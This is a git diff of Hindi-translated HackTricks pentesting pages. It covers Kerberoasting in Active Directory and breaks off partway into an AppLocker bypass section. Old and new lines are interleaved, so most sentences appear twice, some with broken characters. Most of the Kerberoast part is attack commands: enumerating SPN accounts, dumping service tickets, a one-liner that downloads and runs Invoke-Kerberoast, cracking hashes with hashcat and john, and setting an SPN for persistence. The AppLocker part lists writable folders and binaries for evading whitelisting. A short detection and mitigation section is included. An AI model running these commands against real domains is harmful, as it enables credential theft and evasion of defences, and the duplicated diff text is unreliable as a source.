<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>htARTE (HackTricks AWS Red Team Expert) के साथ शून्य से नायक तक AWS हैकिंग सीखें!</strong></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित** की जाए? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की अनुमति चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एकल [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS और HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल** हों या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)** का** **अनुसरण** करें।**
* **अपने हैकिंग ट्रिक्स को** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **में PR जमा करके अपना योगदान दें।**
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**टेलीग्राम समूह**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपोज़ में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।
</details>
## केरबेरोस्ट
## Kerberoast
**केरबेरोस्ट** का उद्देश्य है कि एडी में उपयोगकर्ता खातों के लिए चलाए जाने वाले सेवाओं के लिए **TGS टिकट हार्वेस्ट** करें। इस प्रकार, इन TGS टिकट का एक हिस्सा उपयोगकर्ता पासवर्ड से निर्मित कुंजियों के साथ **एन्क्रिप्टेड** होता है। इसके परिणामस्वरूप, उनके क्रेडेंशियल्स ऑफलाइन में **क्रैक** किए जा सकते हैं।\
आप जान सकते हैं कि एक **उपयोगकर्ता खाता**िसी **सेवा** के रूप में उपयोग हो रहा है क्योंकि गुणधर्म **"ServicePrincipalName"** **null नहीं** है
**Kerberoasting** का उद्देश्य AD में उपयोगकर्ता खातों की ओर से चलने वाली सेवाओं के लिए **TGS टिकटों की फसल** लेना है, कंप्यूटर खातों का नहीं। इस प्रकार, इन TGS **टिकटों का हिस्सा** उपयोगकर्ता के पासवर्ड से निकाले गए **कुंजियों** के साथ **एन्क्रिप्टेड** होता है। परिणामस्वरूप, उनकी साखों को **ऑफलाइन क्रैक** किया जा सकता है।\
आप जान सकते हैं कि एक **उपयोगकर्ता खाता** **सेवा** के रूप में उपयोग किया जा रहा है क्योंकि संपत्ति **"ServicePrincipalName"** **शून्य नहीं है**
इसलिए, केरबेरोस्ट करने के लिए, केवल एक डोमेन खाता जो TGS के लिए अनुरोध कर सकता है, आवश्यक है, जो कोई भी हो सकता है क्योंकि कोई विशेष विशेषाधिकार आवश्यक नहीं है।
इसलिए, Kerberoasting करने के लिए, केवल एक डोमेन खाता जरूरी है जो TGSs के लिए अनुरोध कर सकता है, जो कोई भी हो सकता है क्योंकि कोई विशेष विशेषाधिकार आवश्यक नहीं है
**आपको डोमेन में मान्य प्रमाणिकता की आवश्यकता है।**
**आपको डोमेन के अंदर मान्य साखों की आवश्यकता है।**
### **हमला**
{% hint style="warning" %}
**केरबेरोस्ट उपकरण** आमतौर पर हमला करते समय और TGS-REQ अनुरोधों की शुरुआत करते समय **`RC4 एन्क्रिप्शन`** का अनुरोध करते हैं। इसलिए कि **RC4** [**कमजोर**](https://www.stigviewer.com/stig/windows\_10/2017-04-28/finding/V-63795) है और इसे Hashcat जैसे उपकरणों का उपयोग करके ऑफलाइन में क्रैक करना आसान है अन्य एन्क्रिप्शन एल्गोरिदमों जैसे AES-128 और AES-256 से।\
RC4 (प्रकार 23) हैश **`$krb5tgs$23$*`** से शुरू होते हैं जबकि AES-256 (प्रकार 18) **`$krb5tgs$18$*`** से शुरू होते हैं
**Kerberoasting उपकरण** आमतौर पर हमला करते समय और TGS-REQ अनुरोधों को शुरू करते समय **`RC4 एन्क्रिप्शन`** का अनुरोध करते हैं। यह इसलिए है्योंकि **RC4** [**कमजोर**](https://www.stigviewer.com/stig/windows\_10/2017-04-28/finding/V-63795) है और Hashcat जैसे उपकरणों का उपयोग करके ऑफलाइन क्रैक करना अन्य एन्क्रिप्शन एल्गोरिदम जैसे AES-128 और AES-256 की तुलना में आसान है।\
RC4 (प्रकार 23) हैश **`$krb5tgs$23$*`** से शुरू होते हैं जबकि AES-256(प्रकार 18) **`$krb5tgs$18$*`** से।`
{% endhint %}
#### **लिनक्स**
@ -47,21 +49,21 @@ GetUserSPNs.py -request -dc-ip <DC_IP> -hashes <LMHASH>:<NTHASH> <DOMAIN>/<USERN
kerberoast ldap spn 'ldap+ntlm-password://<DOMAIN.FULL>\<USERNAME>:<PASSWORD>@<DC_IP>' -o kerberoastable # 1. Enumerate kerberoastable users
kerberoast spnroast 'kerberos+password://<DOMAIN.FULL>\<USERNAME>:<PASSWORD>@<DC_IP>' -t kerberoastable_spn_users.txt -o kerberoast.hashes # 2. Dump hashes
```
कर्बेरोस्ट करने योग्य उपयोगकर्ताओं के डंप के साथ बहु-सुविधा उपकरण:
बहु-सुविधा उपकरण जिसमें kerberoastable उपयोगकर्ताओं का डंप शामिल है:
```bash
# ADenum: https://github.com/SecuProject/ADenum
adenum -d <DOMAIN.FULL> -ip <DC_IP> -u <USERNAME> -p <PASSWORD> -c
```
#### Windows
* **केरबेरोस्ट करने योग्य उपयोगकर्ताओं की जांच करें**
* **Kerberoastable उपयोगकर्ताओं की सूची बनाएं**
```powershell
# Get Kerberoastable users
setspn.exe -Q */* #This is a built-in binary. Focus on user accounts
Get-NetUser -SPN | select serviceprincipalname #Powerview
.\Rubeus.exe kerberoast /stats
```
* **तकनीक 1: TGS के लिए पूछें और मेमोरी से डंप करें**
* **तकनीक 1: TGS के लिए अनुरोध करें और इसे मेमोरी से डंप करें**
```powershell
#Get TGS in memory from a single user
Add-Type -AssemblyName System.IdentityModel
@ -98,93 +100,95 @@ iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com
Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes.kerberoast
```
{% hint style="warning" %}
जब एक TGS का अनुरोध किया जाता है, तो Windows इवेंट `4769 - एक केरबेरोस सेवा टिकट का अनुरोध किया गया था` उत्पन्न होता है।
जब TGS का अनुरोध किया जाता है, Windows इवेंट `4769 - A Kerberos service ticket was requested` उत्पन्न होता है।
{% endhint %}
<figure><img src="../../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) का उपयोग करें ताकि आप आसानी से वर्ल्ड के सबसे उन्नत सामुदायिक उपकरणों द्वारा संचालित और स्वचालित कार्यप्रवाह बना सकें।\
[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) का उपयोग करके आसानी से **workflows को बनाएं और स्वचालित करें** जो दुनिया के **सबसे उन्नत** समुदाय उपकरणों द्वारा संचालित होते हैं।\
आज ही पहुंच प्राप्त करें:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
### क्रैकिंग
### Cracking
```bash
john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
```
### स्थिरता
### स्थायित्व
यदि आपके पास क उपयोगकर्ता पर **पर्याप्त अनुमतियाँ** हैं, तो आप इसे **केरबेरोस्टेबल** बना सकते हैं:
यदि आपके पास किसी उपयोगकर्ता पर **पर्याप्त अनुमतियां** हैं, तो आप उसे **kerberoastable बना सकते हैं**:
```bash
Set-DomainObject -Identity <username> -Set @{serviceprincipalname='just/whateverUn1Que'} -verbose
```
आप **kerberoast** हमलों के लिए उपयोगी **टूल** यहाँ ढूंढ सकते हैं: [https://github.com/nidem/kerberoast](https://github.com/nidem/kerberoast)
आप **kerberoast** हमलों के लिए उपयोगी **उपकरण** यहाँ पा सकते हैं: [https://github.com/nidem/kerberoast](https://github.com/nidem/kerberoast)
यदि आपको लिनक्स से यह **त्रुटि** मिलती है: **`Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)`** तो इसका कारण आपका स्थानीय समय है, आपको होस्ट को डीसी के साथ समकालीन करने की आवश्यकता है। कुछ विकल्प हैं:
यदि आपको Linux से यह **एरर** मिलता है: **`Kerberos SessionError: KRB_AP_ERR_SKEW(घड़ी का अंतर बहुत अधिक है)`** तो यह आपके स्थानीय समय के कारण है, आपको होस्ट को DC के साथ समकालिक करने की आवश्यकता है। कुछ विकल्प हैं:
* `ntpdate <DC का IP>` - Ubuntu 16.04 के रूप में अप्रचलित
* `ntpdate <DC का IP>` - Ubuntu 16.04 के रूप में Deprecated
* `rdate -n <DC का IP>`
### रोकथाम
### निवारण
कर्बेरोस्ट बहुत गुप्तचर है यदि इसका शिकार हो सके
Kerberoast बहुत चुपके से होता है यदि इसका शोषण किया जा सकता है
* सुरक्षा घटना आईडी 4769 - कर्बेरोस टिकट का अनुरोध किया गया था
* क्योंकि 4769 बहुत आम है, हम परिणामों को फ़िल्टर करेंगे:
* सुरक्षा इवेंट ID 4769 एक Kerberos टिकट का अनुरोध किया गया था
* चूंकि 4769 बहुत आम है, आइए परिणामों को फ़िल्टर करें:
* सेवा का नाम krbtgt नहीं होना चाहिए
* सेवा का नाम $ से समाप्त नहीं होना चाहिए (सेवाओं के लिए उपयोग किए जाने वाले मशीन खातों को फ़िल्टर करने के लिए)
* खाता का नाम machine@domain नहीं होना चाहिए (मशीनों से अनुरोधों को फ़िल्टर करने के लिए)
* विफलता कोड '0x0' ह (विफलताओं को फ़िल्टर करने के लिए, 0x0 सफलता है)
* सबसे महत्वपूर्ण बात, टिकट एन्क्रिप्शन प्रकार 0x17 है
* रोकथाम:
* सेवा खाता पासवर्ड को अनुमान लगाने के लिए कठिन बनाया जाना चाहिए (25 वर्णों से अधिक)
* प्रबंधित सेवा खाताएं उपयोग करें (नियमित रूप से पासवर्ड का बदलाव और धारित SPN प्रबंधन)
* सेवा का नाम $ से समाप्त नहीं होना चाहिए (सेवाओं के लिए इस्तेमाल किए गए मशीन खातों को फ़िल्टर करने के लिए)
* खाते का नाम मशीन@डोमेन नहीं होना चाहिए (मशीनों से अनुरोधों को फ़िल्टर करने के लिए)
* विफलता कोड '0x0' होना चाहिए (विफलताओं को फ़िल्टर करने के लिए, 0x0 सफलता है)
* सबसे महत्वपूर्ण, टिकट एन्क्रिप्शन प्रकार 0x17 है
* निवारण:
* सेवा खाता पासवर्ड अनुमान लगाने में कठिन होना चाहिए (25 अक्षरों से अधिक)
* प्रबंधित सेवा खातों का उपयोग करें (पासवर्ड का स्वचालित रूप से परिवर्तन और SPN प्रबंधन का प्रतिनिधित्व)
```bash
Get-WinEvent -FilterHashtable @{Logname='Security';ID=4769} -MaxEvents 1000 | ?{$_.Message.split("`n")[8] -ne 'krbtgt' -and $_.Message.split("`n")[8] -ne '*$' -and $_.Message.split("`n")[3] -notlike '*$@*' -and $_.Message.split("`n")[18] -like '*0x0*' -and $_.Message.split("`n")[17] -like "*0x17*"} | select ExpandProperty message
```
## डोमेन खाते के बिना केरबेरोस्ट
## Kerberoast बिना डोमेन अकाउंट के
सितंबर 2022 में [चार्ली क्लार्क](https://exploit.ph/) द्वारा एक संकट मिला, जहां KRB_AS_REQ अनुरोध के माध्यम से ST (सेवा टिकट) को किसी भी एक्टिव डायरेक्टरी खाते को नियंत्रित करने की आवश्यकता नहीं होती है। यदि कोई प्रिंसिपल पूर्व-प्रमाणीकरण के बिना प्रमाणित कर सकता है (जैसे AS-REP Roasting हमला), तो इसे उपयोग करके एक **KRB_AS_REQ** अनुरोध शुरू करना संभव होता है और अनुरोध को धोखा देकर एक **ST** के बजाय एक **एन्क्रिप्टेड TGT** के लिए पूछने के लिए, अनुरोध के req-body भाग में **sname** विशेषता को संशोधित करके।
सितंबर 2022 में [Charlie Clark](https://exploit.ph/) द्वारा एक सुरक्षा दोष की खोज की गई, ST (Service Tickets) को KRB\_AS\_REQ अनुरोध के माध्यम से प्राप्त किया जा सकता है बिना किसी Active Directory अकाउंट के नियंत्रण के। यदि कोई प्रिंसिपल प्री-प्रमाणीकरण के बिना प्रमाणित कर सकता है (जैसे AS-REP Roasting हमला), तो इसका उपयोग **KRB\_AS\_REQ** अनुरोध लॉन्च करने के लिए किया जा सकता है और अनुरोध को चालाकी से **ST** के लिए पूछने के लिए बनाया जा सकता है बजाय **encrypted TGT** के, अनुरोध के req-body भाग में **sname** विशेषता को संशोधित करके।
इस तकनीक की पूरी व्याख्या इस लेख में की गई है: [Semperis ब्लॉग पोस्ट](https://www.semperis.com/blog/new-attack-paths-as-requested-sts/).
{% hint style="warning" %}
आपको उपयोग करने के लिए एक सूची उपयोगकर्ताओं की प्रदान करनी होगी क्योंकि हमारे पास इस तकनीक का उपयोग करके LDAP को क्वेरी करने के लिए कोई वैध खाता नहीं है।
आपको उपयोगकर्ताओं की एक सूची प्रदान करनी होगी क्योंकि हमारे पास इस तकनीक का उपयोग करके LDAP क्वेरी करने के लिए एक मान्य अकाउंट नहीं है।
{% endhint %}
#### लिनक्स
#### Linux
* [impacket/GetUserSPNs.py PR #1413 से](https://github.com/fortra/impacket/pull/1413):
* [impacket/GetUserSPNs.py from PR #1413](https://github.com/fortra/impacket/pull/1413):
```bash
GetUserSPNs.py -no-preauth "NO_PREAUTH_USER" -usersfile "LIST_USERS" -dc-host "dc.domain.local" "domain.local"/
```
#### विंडोज
#### Windows
* [GhostPack/Rubeus से PR #139](https://github.com/GhostPack/Rubeus/pull/139):
```bash
Rubeus.exe kerberoast /outfile:kerberoastables.txt /domain:"domain.local" /dc:"dc.domain.local" /nopreauth:"NO_PREAUTH_USER" /spn:"TARGET_SERVICE"
```
**आईरेड.टीम** में **केरबेरोस्टिंग** के बारे में अधिक जानकारी [यहाँ](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting) और [यहाँ](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberoasting-requesting-rc4-encrypted-tgs-when-aes-is-enabled) मिलेगी।
**ired.team में Kerberoasting के बारे में अधिक जानकारी** [**यहाँ**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting)**और** [**यहाँ**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberoasting-requesting-rc4-encrypted-tgs-when-aes-is-enabled)**पर प्राप्त करें।**
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
<summary><strong>htARTE (HackTricks AWS Red Team Expert) के साथ AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* प्राप्त करें [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)** का पालन करें।**
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को।**
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**।**
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।
</details>
<figure><img src="../../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) का उपयोग करें और आसानी से **वर्फ़्लो बनाएं और स्वचालित करं**, जो दुनिया के **सबसे उन्नत समुदाय उपकरणों** द्वारा संचालित होता है।\
आज ही पहुंच प्राप्त करें:
[**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) का उपयोग करके दुनिया के **सबसे उन्नत** समुदाय उपकरणों द्वारा संचालित **वर्कफ्लो को आसानी से बनाएं और स्वचालित करें**।\
आज ही एक्सेस प्राप्त करें:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

198
windows-hardening/authentication-credentials-uac-and-efs.md
View file

@ -2,33 +2,35 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family)
* [**आधिकारिक PEASS और HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)** का पालन करें**.
* **अपने हैकिंग ट्रिक्स को** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में PR जमा करके साझा करें**
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) या **Twitter** पर मुझे 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)** का अनुसरण करें.**
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।
</details>
<figure><img src="../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../.gitbook/assets/image (3) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) का उपयोग करें और आसानी से वर्फ़्लो बनाएं और संचालित करं, जो दुनिया के **सबसे उन्नत समुदाय उपकरणों** द्वारा संचालित होते हैं।\
आज ही पहुंच प्राप्त करें:
[**Trickest**](https://trickest.com/?utm_campaign=hacktrics\&utm_medium=banner\&utm_source=hacktricks) का उपयोग करके दुनिया के **सबसे उन्नत** समुदाय उपकरणों द्वारा संचालित **वर्कफ्लो को आसानी से बनाएं और स्वचालित करें**।\
आज ही एक्सेस प्राप्त करें:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## AppLocker नीति
एक एप्लिकेशन व्हाइटलिस्ट एक अनुमोदित सॉफ्टवेयर एप्लिकेशन या एक्ज़ीक्यूटेबल्स की सूची होती है जो एक सिस्टम पर मौजूद और चलाने की अनुमति देती है। उद्देश्य यह है कि वातावरण को हानिकारक मैलवेयर और अनुमोदित सॉफ़्टवेयर से सुरक्षित रखा जाए जो संगठन की विशेष व्यापार आवश्यकताओं के साथ मेल नहीं खाता है।
एप्लिकेशन व्हाइटलिस्ट एक प्रकार की सूची होती है जिसमें अनुमोदित सॉफ्टवेयर एप्लिकेशन या एक्जीक्यूटेबल्स होते हैं जिन्हें सिस्टम पर मौजूद होने और चलाने की अनुमति होती है। इसका उद्देश्य हानिकारक मैलवेयर और अनुमोदित नहीं किए गए सॉफ्टवेयर से पर्यावरण की रक्षा करना है जो संगठन की विशिष्ट व्यावसायिक जरूरतों के अनुरूप नहीं है।
[AppLocker](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker) माइक्रोसॉफ्ट का **एप्लिकेशन व्हाइटलिस्टिंग समाधान** है और सिस्टम प्रशासकों को **उपयोगकर्ताओं को कौन सी एप्लिकेशन और फ़ाइलें चला सकते हैं** पर नियंत्रण प्रदान करता है। यह एक्जीक्यूटेबल्स, स्क्रिप्ट, Windows स्थापक फ़ाइलें, DLLs, पैकेज़ किए गए ऐप्स और पैकेज़ किए गए ऐप्स स्थापकों पर **सूक्ष्म नियंत्रण** प्रदान करता है।\
संगठनों के लिए सामान्य है कि **cmd.exe और PowerShell.exe** और कुछ निर्दिष्ट निर्देशिकाओं के लिए लेखक उपयोग को रोकें, **लेकिन इसे सभी बाईपास किया जा सकता है**।
[AppLocker](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker) Microsoft का **एप्लिकेशन व्हाइटलिस्टिंग समाधान** है और यह सिस्टम प्रशासकों को नियंत्रण प्रदान करता है **कि उपयोगकर्ता कौन से एप्लिकेशन और फाइलें चला सकते हैं**। यह एक्जीक्यूटेबल्स, स्क्रिप्ट्स, Windows इंस्टॉलर फाइल्स, DLLs, पैकेज्ड एप्स, और पैक्ड एप इंस्टॉलर्स पर **विस्तृत नियंत्रण** प्रदान करता है।\
यह आम है कि संगठन **cmd.exe और PowerShell.exe को ब्लॉक करते हैं** और कुछ डायरेक्टरीज में लिखने की अनुमति नहीं देते हैं, **लेकिन यह सब बाईपास किया जा सकता है**।
### जांचें
### जांच
जांचें कि कौन सी फाइलें/एक्सटेंशन ब्लैकलिस्ट/व्हाइटलिस्ट की गई हैं:
जांचें कि कौन सी फाइलें/एक्सटेंशन ब्लैकलिस्टेड/व्हाइटलिस्टेड हैं:
```powershell
Get-ApplockerPolicy -Effective -xml
@ -37,58 +39,56 @@ Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
$a = Get-ApplockerPolicy -effective
$a.rulecollections
```
एक होस्ट पर लागू एपलॉकर नियम भी **स्थानीय रजिस्ट्री से पढ़े जा सकते हैं** जो **`HKLM\Software\Policies\Microsoft\Windows\SrpV2`** पर स्थित होते हैं।
### बायपास
### बाईपास
* एपलॉकर नीति को बाईपास करने के लिए उपयोगी **लिखने योग्य फ़ोल्डर**: यदि एपलॉकर को `C:\Windows\System32` या `C:\Windows` के अंदर कुछ भी निष्पादित करने की अनुमति दी जा रही है, तो आप इसे बाईपास करने के लिए **लिखने योग्य फ़ोल्डर** का उपयोग कर सकते हैं।
* AppLocker नीति को बायपास करने के लिए उपयोगी **लिखने योग्य फ़ोल्डर**: यदि AppLocker `C:\Windows\System32` या `C:\Windows` के अंदर कुछ भी निष्पादित करने की अनुमति दे रहा है, तो वहाँ **लिखने योग्य फ़ोल्डर** हैं जिनका उपयोग आप **इसे बायपास करने** के लिए कर सकते हैं।
```
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\windows\tracing
```
* सामान्य रूप से **विश्वसनीय** [**"LOLBAS's"**](https://lolbas-project.github.io/) बाइनरी भी AppLocker को दौरा करने के लिए उपयोगी हो सकती हैं।
* **बुरी तरह से लिखी गई नियमों को भी दौरा किया जा सकता है**
* उदाहरण के लिए, **`<FilePathCondition Path="%OSDRIVE%*\allowed*"/>`**, आप कहीं भी एक **`allowed`** नामक फ़ोल्डर बना सकते हैं और उसे अनुमति दी जाएगी।
* संगठन अक्सर **`%System32%\WindowsPowerShell\v1.0\powershell.exe` एक्ीक्यूटेबल को ब्लॉक करने** पर ध्यान केंद्रित करते हैं, लेकिन वे **अन्य** [**PowerShell एक्सीक्यूटेबल स्थान**](https://www.powershelladmin.com/wiki/PowerShell\_Executables\_File\_System\_Locations) जैसे `%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe` या `PowerShell_ISE.exe` के बारे में भूल जाते हैं।
* **DLL प्रवर्तन बहुत ही कम बार चालू होता है** क्योंकि इससे सिस्टम पर अतिरिक्त भार आ सकता है, और सुनिश्चित करने के लिए आवश्यक परीक्षण की मात्रा। इसलिए **DLL को बैकडोर के रूप में उपयोग करने से AppLocker को दौरा करने में मदद मिलेगी**।
* आप [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) या [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) का उपयोग करके किसी भी प्रक्रिया में **Powershell को निष्पादित** कर सकते हैं और AppLocker को दौरा कर सकते हैं। अधिक जानकारी के लिए देखें: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode).
